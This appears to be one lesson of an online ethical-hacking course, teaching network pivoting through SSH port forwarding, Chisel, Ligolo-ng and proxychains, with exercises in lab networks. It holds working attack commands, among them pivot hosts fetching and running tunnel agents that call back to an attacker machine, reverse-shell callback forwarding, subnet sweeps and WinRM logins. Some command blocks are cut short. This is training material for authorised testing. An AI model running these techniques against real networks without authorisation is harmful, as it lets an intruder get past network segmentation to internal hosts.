⚠️ Authorised Engagements Only: Pivoting & tunneling extend access through segmented networks. All exercises use isolated lab environments — your own VMs, TryHackMe, or HackTheBox. Never deploy pivoting tools on networks you do not have explicit written authorisation to test. SecurityElites.com accepts no liability for misuse.
On a red team engagement two years ago, I compromised a web server in the client’s DMZ. The scope was to confirm whether network segmentation between DMZ and the internal corporate network was effective. The firewall was correctly configured — I could not reach the internal segment directly. But the web server had two network interfaces: one facing the internet, one facing the internal network. Twenty minutes after establishing my initial foothold, I had a Chisel tunnel running, my Nmap output was scanning the internal subnet, and I had identified the domain controller. The client’s firewall had done exactly what it was designed to do. Pivoting bypassed it entirely by routing through a host that was already trusted to bridge both sides.
Network segmentation is a valid control against external attackers — but once an attacker has an internal foothold, the segmentation becomes a map of where to go next rather than a barrier. Day 36 gives you the full toolkit: SSH tunnels for quick single-service access, Chisel for HTTP-based tunneling through restrictive firewalls, Ligolo-ng for transparent network routing without proxychains limitations, and SOCKS5 to route any tool through any pivot. These are the techniques that C2 operators deploy after the initial beacon from Day 35 to reach isolated network segments.
What is your current pivoting experience level?
🎯 What You’ll Master in Day 36
Understand the segmented network problem that pivoting solves
SSH local, remote, and dynamic port forwarding — command and use case for each
Chisel HTTP tunneling — reverse SOCKS5 when SSH is unavailable or firewalled
Ligolo-ng transparent proxying — native tool routing without proxychains overhead
SOCKS5 proxychains configuration and routing Nmap through a pivot
Double pivot — chaining two hops to reach isolated network segments
⏱️ Day 36 · 3 exercises · Think Like Hacker + TryHackMe + Kali Lab
✅ Prerequisites
Day 35 — C2 Frameworks
— SMB C2 relay chains from Day 35 connect directly to today’s pivot techniques; the agent relay model is pivoting at the C2 layer
Day 34 — Payload Obfuscation
— Chisel and Ligolo-ng agents are binaries transferred to pivot hosts; EDR evasion from Day 34 applies to delivery
Day 23 — Active Directory Basics
— the internal hosts you pivot to are AD-joined; knowing what to look for prioritises your targets
Kali Linux with two VMs on an isolated host-only network for Exercise 3
Yesterday in Day 35 you set up a C2 framework and maintained persistent access through a beacon callback loop. Today’s techniques extend that access through the network — reaching hosts your beacon cannot contact directly because they sit in a separate segment with no internet access. Pivoting is the bridge between initial access and full internal network compromise in the 100-day course. The tools here are what every professional red teamer runs in the first hour after establishing a foothold inside a segmented enterprise.
The Segmented Network Problem — Why Pivoting Exists
Enterprise networks are not flat. A mature organisation separates systems into segments: a DMZ for internet-facing services, a production network for application servers, a corporate network for workstations, a management network for infrastructure. Firewall rules control what can communicate with what. The theory: compromising one segment does not give access to the others.
The problem is that some hosts legitimately need to communicate across segment boundaries. A web server in the DMZ queries a database in the production network. A jump box sits at the intersection of multiple segments for administrator access. These trusted hosts are your pivot points — they already have the network access you need, and once you are on them, you inherit their routing.
The first thing I do after establishing a foothold is map the network interfaces. Every additional interface beyond the one you entered through is a connection to another segment. That mapping tells you exactly where to pivot before you run a single tunneling tool.
NETWORK RECONNAISSANCE FROM PIVOT HOST
# Map all interfaces on the foothold host
ip addr
eth0: 10.10.10.5/24 ← your entry point (internet-facing)
eth1: 192.168.1.50/24 ← internal network — NEW SEGMENT
# Check the routing table — what can this host reach?
ip route
10.10.10.0/24 dev eth0
192.168.1.0/24 dev eth1 ← reachable from here, not from your Kali
# Quick internal host discovery (bash ping sweep)
for i in $(seq 1 254); do (ping -c1 -W1 192.168.1.$i &>/dev/null && echo “192.168.1.$i up”) & done; wait
🧠 EXERCISE 1 — THINK LIKE A HACKER (20 MIN · NO TOOLS)
Design a Complete Pivot Chain for a Three-Segment Enterprise Network
⏱️ 20 minutes · No tools needed
Professional pivot planning happens before you deploy a single binary. Map the network, choose the right technique for each hop, and anticipate what defenders see in their logs. Work through this scenario the same way I approach a segmented enterprise before touching any tunneling tool.
SCENARIO: You have a web shell on a DMZ web server (Pivot Host 1).
IPs: 10.10.10.5 (internet-facing) and 192.168.1.50 (internal LAN).
The internal LAN has an HR server at 192.168.1.20 — no internet access.
The DMZ host runs SSH on port 22. No Chisel or Ligolo installed yet.
Your Kali machine at 10.10.10.100 cannot reach 192.168.1.x directly.
QUESTION 1 — You want to run a single curl against the HR server
web app on port 80. Write the exact SSH command from Kali.
What does it do and what would you hit with curl?
QUESTION 2 — You want to run proxychains Nmap against the entire
192.168.1.0/24 subnet. Which SSH forwarding type do you use?
Write the exact command. What proxychains4.conf change is needed?
QUESTION 3 — The security team adds a firewall rule: port 22 from
the DMZ host to internet is now blocked. SSH reverse tunnels fail.
What tool do you deploy next? Write both the Kali and pivot host
commands to re-establish access over a different protocol.
QUESTION 4 — The IT team patches SSH and monitors HTTP.
Describe what the traffic from Question 3 looks like in their
firewall logs. Is it encrypted? What port does it use?
QUESTION 5 — You gain a foothold on 192.168.1.20 (HR server).
It has a second interface: 10.20.0.15 pointing to a finance segment.
You want to reach the finance domain controller at 10.20.0.5 from Kali.
Describe the double pivot chain at a high level — two sentences.
✅ You just designed a complete multi-hop pivot strategy before touching the keyboard. The answers: (1) ssh -L 8080:192.168.1.20:80 user@10.10.10.5 then curl http://localhost:8080; (2) ssh -D 1080 -fN user@10.10.10.5 then add socks5 127.0.0.1 1080 to proxychains4.conf; (3) Chisel — server on Kali port 8080, client on pivot host connecting back R:socks; (4) Chisel over HTTP looks like a normal outbound HTTP POST — encrypted, port 80 or 443, indistinguishable from web traffic without deep inspection; (5) Tunnel from Kali through Pivot1 to reach Pivot2, then second tunnel from Pivot2 through to 10.20.0.5 — two SOCKS5 entries in proxychains with dynamic_chain.
📸 Draw your pivot chain diagram and share in #ethical-hacking-course on Discord.
SSH Port Forwarding — Local, Remote, and Dynamic
SSH port forwarding is the first pivoting technique because it requires nothing beyond SSH access — no extra binaries, no uploaded tools, no exotic protocols. Three types cover almost every single-hop scenario. Local for accessing one internal service. Remote for punching callbacks through firewalls. Dynamic for a full SOCKS5 proxy to an entire subnet.
SSH PORT FORWARDING — ALL THREE TYPES WITH USE CASES
# ── LOCAL PORT FORWARDING ──────────────────────────────────────
# Map localhost:8080 → internal 192.168.1.20:80 via pivot at 10.10.10.5
ssh -L 8080:192.168.1.20:80 user@10.10.10.5
→ curl http://localhost:8080 hits the internal web server
# RDP to internal Windows host:
ssh -L 3389:192.168.1.20:3389 user@10.10.10.5
→ xfreerdp /v:localhost:3389 /u:admin /p:password
# ── REMOTE PORT FORWARDING ─────────────────────────────────────
# Run ON the pivot host — connects back to Kali for reverse shells
ssh -R 4444:localhost:4444 user@KALI_IP
→ Port 4444 on pivot now forwards to Kali localhost:4444
# Use for: C2 callbacks through firewalled environments
# ── DYNAMIC PORT FORWARDING (SOCKS5) ───────────────────────────
# SOCKS5 proxy on localhost:1080 — route any TCP tool through pivot
[proxychains] Dynamic chain → 127.0.0.1:1080 → 192.168.1.20:80 → OK
Nmap scan report for 192.168.1.20
22/tcp open ssh
80/tcp open http
3389/tcp open ms-wbt-server
5985/tcp open wsman ← WinRM — Evil-WinRM target with valid credentials
📸 SSH dynamic port forward creating a SOCKS5 proxy on localhost:1080, with proxychains routing a TCP connect scan to an internal Windows host. Port 5985 (WinRM) open immediately flags an Evil-WinRM attack path. All traffic appears in the DMZ server’s logs as local connections — the internal host sees requests from the DMZ server’s interface, not from your Kali machine.
Chisel — HTTP Tunneling When SSH is Not Available
SSH requires SSH access. When all you have is a web shell, a Meterpreter session, or a pivot host where port 22 is blocked outbound, Chisel fills the gap. Chisel is a Go binary that creates an encrypted TCP tunnel over HTTP/HTTPS. The reverse tunnel model is what makes it useful: the pivot host initiates an outbound HTTP connection to your Kali server — a port almost never blocked — establishing a reverse SOCKS5 tunnel back through the firewall.
CHISEL — REVERSE SOCKS5 TUNNEL OVER HTTP
# ── KALI: Start Chisel server in reverse mode ──────────────────
chisel server -p 8080 –reverse
[*] chisel server v1.9.1 — listening on 0.0.0.0:8080
# ── PIVOT HOST: Download and run Chisel client ─────────────────
Ligolo-ng — Transparent Routing Without Proxychains
Proxychains works but has real limitations. Tools that do not support SOCKS5 — many compiled binaries — simply cannot use it. Standard ping and ICMP-based tools fail entirely. UDP traffic is not forwarded. And there is performance overhead from the SOCKS5 wrapper that slows high-volume scans considerably. Ligolo-ng solves all of these.
Ligolo-ng creates a TUN network interface on your attack machine. You add a route for the internal subnet through that interface. The kernel routes traffic natively — no wrapper, no compatibility issues, all scan types including SYN scans work. Every tool treats the internal network as if it were directly connected to your Kali machine. This is the professional choice for sustained internal access on any real engagement.
LIGOLO-NG — TRANSPARENT TUNNEL SETUP
# ── KALI: Create the TUN interface (once per session) ──────────
[*] ligolo-ng proxy v0.6.2 started — listening on 0.0.0.0:11601
# ── PIVOT HOST: Transfer and run agent ─────────────────────────
./agent -connect KALI_IP:11601 -ignore-cert
[*] agent: connected — session established
# ── KALI: In Ligolo-ng console ──────────────────────────────────
ligolo-ng » session
ligolo-ng » 1 # select the active session
ligolo-ng » start # activate tunnel
[*] tunnel started
# ── Add route for internal subnet via ligolo interface ──────────
sudo ip route add 192.168.1.0/24 dev ligolo
# ── All tools now work natively — NO proxychains prefix ─────────
nmap -sS -p 1-1000 192.168.1.20 # SYN scan works — no -sT needed
evil-winrm -i 192.168.1.20 -u admin -p ‘Pass1!’
firefox http://192.168.1.20/admin # browser works natively
crackmapexec smb 192.168.1.0/24 # no proxychains wrapper
💡 Ligolo-ng vs Proxychains: Use proxychains for a quick tunnel with minimal setup when running a small number of simple TCP tools. Use Ligolo-ng for sustained internal access, SYN scans, UDP, browser-based enumeration, or any tool that does not support SOCKS5. On real engagements I set up Ligolo-ng in the first thirty minutes after establishing a foothold — the quality-of-life improvement for everything that follows is significant.
SOCKS5 Proxychains — Routing Tools Through Your Tunnel
Whether your tunnel is SSH dynamic, Chisel, or Ligolo-ng in SOCKS mode, proxychains routes individual tools. One configuration line. One command prefix. Two things to remember: proxychains only handles TCP — SYN scans and UDP tools will not work. And proxychains adds overhead — for large subnet scans, Ligolo-ng is faster and supports all scan types.
PROXYCHAINS4 CONFIGURATION AND COMMON USAGE
# Configure proxychains4.conf
sudo nano /etc/proxychains4.conf
# Comment out: socks4 127.0.0.1 9050 (default Tor line)
# Add your tunnel:
socks5 127.0.0.1 1080
# Verify proxychains reads the config correctly
proxychains curl -s http://192.168.1.20/ | head -5
# Nmap through proxychains — MUST use -sT (connect scan)
# Quiet mode — suppress verbose proxychains output in scripts
proxychains -q nmap -sT -p 445 192.168.1.0/24
Double Pivot — Reaching Isolated Segments
A double pivot chains two compromised hosts to reach a segment neither your machine nor your first pivot can access directly. The architecture: your Kali reaches Segment B through Pivot Host 1. Pivot Host 2 is in Segment B and also has an interface in Segment C. You tunnel through Host 1 to Host 2 and then through Host 2 to the target in Segment C. The Chisel nested approach is the cleanest implementation.
# Traffic: Kali → Pivot1:1080 → Pivot2:1081 → DC 10.20.0.5
🌐 EXERCISE 2 — TRYHACKME (25 MIN)
Practice Multi-Hop Pivoting in the TryHackMe Wreath Network
⏱️ 25 minutes · TryHackMe free account
TryHackMe’s Wreath network is the best free multi-segment pivoting lab available — a three-machine network requiring you to apply exactly the SSH and Chisel techniques from today. Work through the pivoting tasks in order before building your own Kali lab in Exercise 3.
Step 1: Go to tryhackme.com and search “Wreath”
Read the network overview — note which machines are directly
reachable from your TryHackMe machine and which require a pivot.
Step 2: Complete the SSH local port forward task.
Write down the exact command. What internal service did it expose?
Web app? RDP? What did you find once connected?
Step 3: Complete the Chisel reverse tunnel task.
Record: server command on attack machine,
client command on the pivot host,
proxychains4.conf entry used.
Step 4: Run proxychains Nmap against the internal segment.
Record: how many hosts found, which ports were open.
Which finding was highest priority for next-step exploitation?
Step 5: Compare the tools you used. Answer these questions:
— Why does proxychains nmap require -sT and -Pn?
— What would Ligolo-ng change about the Nmap command?
— Which pivot technique required the fewest file transfers to the pivot?
✅ The Wreath network mirrors the exact architecture you encounter in enterprise engagements — an internet-facing host bridging to an internal network that you cannot reach directly from outside. The Step 5 comparison locks in why tool choice matters: proxychains TCP-only limitation versus Ligolo-ng native routing. Those observations feed directly into Exercise 3 where you build and compare both in your own lab.
📸 Screenshot your proxychains Nmap output against the internal segment. Share in #ethical-hacking-course on Discord.
⚡ EXERCISE 3 — KALI TERMINAL (25 MIN)
Set Up Chisel and Ligolo-ng in Your Own Lab and Compare Both
⏱️ 25 minutes · Kali Linux · Two VMs on isolated host-only network
This exercise runs the full setup in your own lab — Kali as the attack machine, a second Linux VM as the pivot host with a second interface on a subnet your Kali cannot reach. By the end you will have both tunnels running and a direct speed and capability comparison between proxychains and Ligolo-ng.
Lab setup: Two VMs on VirtualBox/VMware host-only network
Kali: 192.168.56.100
Pivot VM (Ubuntu/Debian): 192.168.56.101 + second interface on 10.10.10.0/24
Confirm: Kali cannot ping 10.10.10.x directly
PART A — Chisel tunnel
KALI: chisel server -p 8080 –reverse
PIVOT: wget http://192.168.56.100:8000/chisel_linux_amd64 -O /tmp/chisel
chmod +x /tmp/chisel && /tmp/chisel client 192.168.56.100:8080 R:socks
KALI: echo “socks5 127.0.0.1 1080” >> /etc/proxychains4.conf
TEST: time proxychains nmap -sT -Pn -p 22,80 10.10.10.1
PART B — Ligolo-ng tunnel (same target, compare results)
KALI: sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:11601
PIVOT: ./agent -connect 192.168.56.100:11601 -ignore-cert
KALI (ligolo console):
session → 1 → start
sudo ip route add 10.10.10.0/24 dev ligolo
TEST: time nmap -sS -Pn -p 22,80 10.10.10.1 (no proxychains needed)
PART C — Key comparison questions
1. What scan type did you need for proxychains Nmap vs Ligolo Nmap?
2. Which completed the scan faster?
3. Try: proxychains nmap -sS -p 22 10.10.10.1 — what happens?
4. Try: nmap -sS -p 22 10.10.10.1 via Ligolo — what happens?
5. Which tool would you choose for a sustained 3-hour internal assessment?
✅ You just ran both tunnels against the same target and have concrete timing data to compare. The proxychains -sS failure versus the Ligolo-ng -sS success is the clearest demonstration of why Ligolo-ng is the professional choice for sustained internal access. Keep both tunnels in your toolkit — Chisel for rapid deployment when you only have a web shell, Ligolo-ng for quality assessment work once you have a stable session. Day 37 uses this internal access to establish persistence across the hosts you just reached.
📸 Screenshot Ligolo-ng proxy console showing your active tunnel alongside the native SYN scan running. Share in #ethical-hacking-course on Discord. Tag #day36complete
📋 Pivoting & Tunneling — Day 36 Reference Card
Map pivot host interfacesip addr · ip route
SSH local forwardssh -L LOCAL:TARGET_IP:PORT user@PIVOT
SSH dynamic (SOCKS5)ssh -D 1080 -fN user@PIVOT
Chisel server (Kali)chisel server -p 8080 –reverse
SSH local, remote, and dynamic forwarding; Chisel reverse SOCKS5 over HTTP; Ligolo-ng transparent routing; proxychains tool configuration; and double pivot chains. The internal network is reachable. Day 37 covers network persistence — registry run keys, scheduled tasks, service backdoors, and WMI subscriptions that keep your access alive across reboots on the hosts you just reached.
🧠 Day 36 Check
You have a Chisel SOCKS5 tunnel on localhost:1080. You run: proxychains nmap -sS -Pn -p 445 192.168.1.20 — the scan returns no results. You then run proxychains nmap -sT -Pn -p 445 192.168.1.20 — it returns port 445 open. Why did -sS fail and -sT succeed?
❓ Pivoting & Tunneling FAQ
What is network pivoting in ethical hacking?
Network pivoting is using a compromised host as a relay to reach segments not directly accessible from your attack machine. Enterprise networks segment internal hosts from the internet. Once you compromise a host that bridges two segments, pivoting tunnels your traffic through it — reaching internal hosts, domain controllers, and isolated systems as if your machine were inside the network.
What is the difference between SSH local and dynamic port forwarding?
SSH local port forwarding (-L) maps one local port to one internal service — useful for accessing a single target like RDP or a web app. SSH dynamic port forwarding (-D) creates a SOCKS5 proxy that routes traffic to any destination through the pivot host — used with proxychains for full subnet enumeration and multi-target access.
When should you use Chisel instead of SSH?
Use Chisel when SSH is unavailable on the pivot host, port 22 is firewalled, or you only have a web shell. Chisel creates an encrypted tunnel over HTTP that passes through most corporate firewalls. The reverse model — pivot host connects outbound to your server — bypasses environments that block inbound connections to your attack machine.
What is Ligolo-ng and how does it differ from proxychains?
Ligolo-ng creates a transparent TUN network interface on your attack machine. Unlike proxychains which wraps individual TCP tools in SOCKS5, Ligolo-ng makes the internal network a direct route — all tools work natively without any prefix, including SYN scans, UDP traffic, and browser-based tools that cannot use SOCKS5 proxies.
How do you run Nmap through a SOCKS5 pivot?
With proxychains: proxychains nmap -sT -Pn -p PORTS TARGET — TCP connect scan only. SOCKS5 cannot relay raw IP packets so SYN scans fail. With Ligolo-ng: run nmap directly without proxychains — all scan types work including -sS because Ligolo-ng routes at the network interface level, not the socket level.
What is a double pivot?
A double pivot chains two compromised hosts to reach a segment neither your machine nor the first pivot can access. You tunnel through Pivot Host 1 to Segment B, then tunnel through Pivot Host 2 (in Segment B) to Segment C. Proxychains with dynamic_chain and two SOCKS5 entries in sequence routes traffic through both hops automatically.
← Previous
Day 35 — C2 Frameworks
Next →
Day 37 — Network Persistence
📚 Further Reading
Day 35 — C2 Frameworks— Cobalt Strike and Sliver SMB C2 relay chains are the professional implementation of what you built manually with Chisel today — understanding both gives you the complete internal access picture.
Day 33 — AV Evasion Basics— Chisel and Ligolo-ng agents are binaries transferred to EDR-protected pivot hosts — evasion techniques from Day 33 apply before you transfer the binary.
Ethical Hacking Course Hub— Full 100-day overview — Day 36 pivoting sits at the centre of the internal network attack phase spanning Days 35–45.
Chisel — GitHub Repository— Official Chisel source and documentation covering all tunnel modes including multi-hop configurations, TLS options, and Windows binary builds.
Ligolo-ng — GitHub Repository— Official Ligolo-ng source with full wiki covering TUN setup, multi-session management, and advanced routing for enterprise multi-segment pivoting.
ME
Mr Elite
Owner, SecurityElites.com
The first time I ran a double pivot on a real engagement, I spent twenty minutes troubleshooting proxychains configuration before a senior colleague pointed out that Ligolo-ng existed. I rebuilt the entire pivot chain in eight minutes, got native SYN scans against the finance segment, and found the domain controller in under two minutes. I have used Ligolo-ng on every internal network engagement since. That twenty-minute troubleshooting session was the best lesson I ever had about why tool selection matters as much as technique — which is why Day 36 covers both, not just the one most guides mention.
